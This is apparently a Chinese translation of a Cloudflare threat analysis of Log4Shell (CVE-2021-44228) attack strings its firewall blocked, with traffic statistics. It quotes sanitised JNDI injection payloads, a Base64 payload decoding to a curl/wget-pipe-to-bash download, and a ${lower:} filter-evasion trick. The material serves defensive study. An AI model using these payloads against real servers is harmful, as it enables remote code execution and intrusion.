在自然環(huán)境中捕獲的實(shí)際CVE-2021-44228有效負(fù)載

現(xiàn)在我們有了關(guān)于掃描并企圖利用該漏洞的小時(shí)數(shù)據(jù)，我們就可以開(kāi)始考察一下自然環(huán)境中使用的實(shí)際有效負(fù)載以及統(tǒng)計(jì)數(shù)據(jù)。我們先來(lái)看一下 Cloudflare 通過(guò)我們的 WAF 阻止的請(qǐng)求。

我們看到今天上午（此處的時(shí)間為協(xié)調(diào)世界時(shí) (UTC)）阻止的攻擊數(shù)量緩慢上升，最大峰值大約為 1800（每分鐘阻止的漏洞利用請(qǐng)求數(shù)大約為 20,000）。但掃描過(guò)程全天一直在持續(xù)。我們預(yù)期這種情況會(huì)繼續(xù)。

我們還查看了 WAF 阻止的 IP 地址數(shù)?？雌饋?lái)在任何給定時(shí)間活躍掃描了大約 200 到 400 個(gè) IP。

到目前為止，最大數(shù)量的掃描或漏洞利用企圖來(lái)自加拿大，其次是美國(guó)。

大量被阻止的請(qǐng)求看起來(lái)采用了偵察的形式，以確定服務(wù)器是否實(shí)際上可被利用。主要的被阻止漏洞利用字符串如下（自始至終，我都清理了域名和 IP 地址）：

${jndi:ldap://x.x.x.x/#Touch}

這看起來(lái)是在 x.x.x.x（這無(wú)疑被入侵者控制）訪(fǎng)問(wèn)服務(wù)器并記錄某個(gè)互聯(lián)網(wǎng)屬性可被利用的簡(jiǎn)單方法。上述字符串并沒(méi)有給入侵者透露多少信息。熱門(mén)程度排第二的請(qǐng)求包含了以下內(nèi)容：

Mozilla/5.0 ${jndi:ldap://x.x.x.x:5555/ExploitD}/ua

這出現(xiàn)在請(qǐng)求的 User-Agent 字段中。請(qǐng)注意，在 URI 末尾是 /ua。這無(wú)疑為入侵者提供了線(xiàn)索，表示可在 User-Agent 中利用漏洞。

另一個(gè)令人關(guān)注的有效負(fù)載顯示，入侵者詳述了可行的格式（在這種情況下是對(duì)端口 443 的非加密請(qǐng)求，并且入侵者在試圖使用 http://）：

${jndi:http://x.x.x.x/callback/https-port-443-and-http-callback-scheme}

有人試圖假裝 Googlebot，并包括了一些額外信息。

Googlebot/2.1 (+http://www.google.com/bot.html)${jndi:ldap://x.x.x.x:80/Log4jRCE}

在以下情況下，入侵者訪(fǎng)問(wèn)了公共 Cloudflare IP，并在漏洞利用有效負(fù)載中對(duì)該 IP 地址進(jìn)行了編碼。這樣一來(lái)，入侵者就可以?huà)呙柙S多 IP，并找出哪些容易受到攻擊。

${jndi:ldap://enq0u7nftpr.m.example.com:80/cf-198-41-223-33.cloudflare.com.gu}

該方案的一種變體是在漏洞利用有效負(fù)載中包括受攻擊網(wǎng)站的名稱(chēng)。

${jndi:ldap://www.blogs.example.com.gu.c1me2000ssggnaro4eyyb.example.com/www.blogs.example.com}

一些入侵者未使用 LDAP，而是采用了 DNS。但是，LDAP 比其他協(xié)議常用得多。

${jndi:dns://aeutbj.example.com/ext}

一個(gè)令人關(guān)注的掃描涉及使用 Java 和標(biāo)準(zhǔn) Linux 命令行工具。有效負(fù)載如下所示：

${jndi:ldap://x.x.x.x:12344/Basic/Command/Base64/KGN1cmwgLXMgeC54LngueDo1ODc0L3kueS55Lnk6NDQzfHx3Z2V0IC1xIC1PLSB4LngueC54OjU4NzQveS55LnkueTo0NDMpfGJhc2g=}

Base64 編碼部分解碼為 curl，并通過(guò) wget 傳輸?shù)?bash 中。

(curl -s x.x.x.x:5874/y.y.y.y:443||wget -q -O- x.x.x.x:5874/y.y.y.y:443)|bash

請(qǐng)注意，curl/wget 的輸出不是必需的，因此這只是訪(fǎng)問(wèn)服務(wù)器以向入侵者指示漏洞利用行得通。

最后，我們看到有人很積極地企圖使用 Log4j 的其他功能來(lái)逃避對(duì) ${jndi:ldap 之類(lèi)的字符串的簡(jiǎn)化阻止。例如，常見(jiàn)的逃避方法似乎是使用 ${lower} 功能（用于將字符變?yōu)樾?xiě)），如下所示：

${jndi:${lower:l}${lower:d}a${lower:p}://example.com/x

此時(shí)，看起來(lái)有大量偵察活動(dòng)在進(jìn)行。全世界善意和不良的入侵者都在掃描有漏洞的服務(wù)器。最終，其中一些偵察活動(dòng)會(huì)轉(zhuǎn)變?yōu)閷?duì)服務(wù)器和公司的實(shí)際滲透。此外，由于日志記錄深度嵌入前端和后端系統(tǒng)中，某些偵察活動(dòng)在幾小時(shí)或幾天內(nèi)都不易被察覺(jué)。

就像孢子在地下悄無(wú)聲息地生長(zhǎng)，某些偵察活動(dòng)會(huì)破土而出，暴露于陽(yáng)光之下。

隨著漏洞利用企圖不斷演化，Cloudflare 的安全團(tuán)隊(duì)也在不斷找對(duì)策，并將根據(jù)需要更新 WAF 和防火墻規(guī)則。